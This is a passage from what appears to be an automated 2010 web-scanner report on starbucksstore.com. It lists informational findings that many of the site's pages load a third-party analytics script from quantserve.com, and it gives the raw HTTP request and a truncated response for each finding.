...[SNIP]...

10.70. http://www.starbucksstore.com/StarbucksCard/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /StarbucksCard/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /StarbucksCard/default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19809
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:37 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.71. http://www.starbucksstore.com/coffee-machines/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee-machines/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21084
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:35:58 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.72. http://www.starbucksstore.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:40 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.73. http://www.starbucksstore.com/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16333
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:31 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.74. http://www.starbucksstore.com/extras/newsletters.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /extras/newsletters.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16315
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:12 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.75. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/ga_faq_shipop.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42716
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:01 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.76. http://www.starbucksstore.com/guestassist/gareturns.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/gareturns.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15036
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:11 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.77. http://www.starbucksstore.com/guestassist/shcontus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20601
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:57 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.78. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaemailconfirm.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /guestassist/shgaemailconfirm.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shgaform.asp
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1312787331-1289934823813; ASPSESSIONIDACACCDBA=POGLDLCBAAAEGEBIMPBBLEID; s_cc=true; __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.2.10.1289934824; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shgaform.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_submit2.gif%2526ot%253DIMAGE
Content-Length: 628

txtFirstName=Hoyt&txtMidInitial=&txtLastName=LLC&txtEMailAddress=h02332%40gmail.com&cboSubTopics=5&txtareaMessage=Hello+and+Good+Day-%0D%0A%0D%0AHoyt+LLC+from+David%2C+Ma..+this+is+David..%0D%0A2+issu
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12588
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=HCCBELCBGFGJAEFDAFOHNILL; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:39:41 GMT

<!--S1--><!--S0-->
   

<!-- Common Function include file -->

<!-- EMail include file -->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HT
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.79. http://www.starbucksstore.com/guestassist/shgaform.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /guestassist/shgaform.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; s_cc=true; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.1.10.1289934824; __qca=P0-1312787331-1289934823813; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shcontus.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_writeemail.gif%2526ot%253DIMAGE
Content-Length: 67

cboSubjects=1000&cboSubTopics=1006&EMail.x=83&EMail.y=9&EMail=email

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16848
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=JDPAELCBMFLNOOGBJGPPEOAB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:36:18 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.80. http://www.starbucksstore.com/mya/links.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/links.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15609
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:40 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.81. http://www.starbucksstore.com/mya/track.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/track.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18332
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:42 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.82. http://www.starbucksstore.com/products/shabotus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shabotus.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14434
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:33 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.83. http://www.starbucksstore.com/products/shourplg.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shourplg.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25328
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:40:37 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.84. http://www.starbucksstore.com/products/shprodde.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/shprodde.asp?SKU=317917 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35039
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:53 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.85. http://www.starbucksstore.com/products/shprodli.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.86. http://www.starbucksstore.com/products/sitemap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/sitemap.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21107
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.87. http://www.starbucksstore.com/products/terms.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/terms.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15912
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:44 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.88. http://www.starbucksstore.com/starbucks-coffee-delivery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
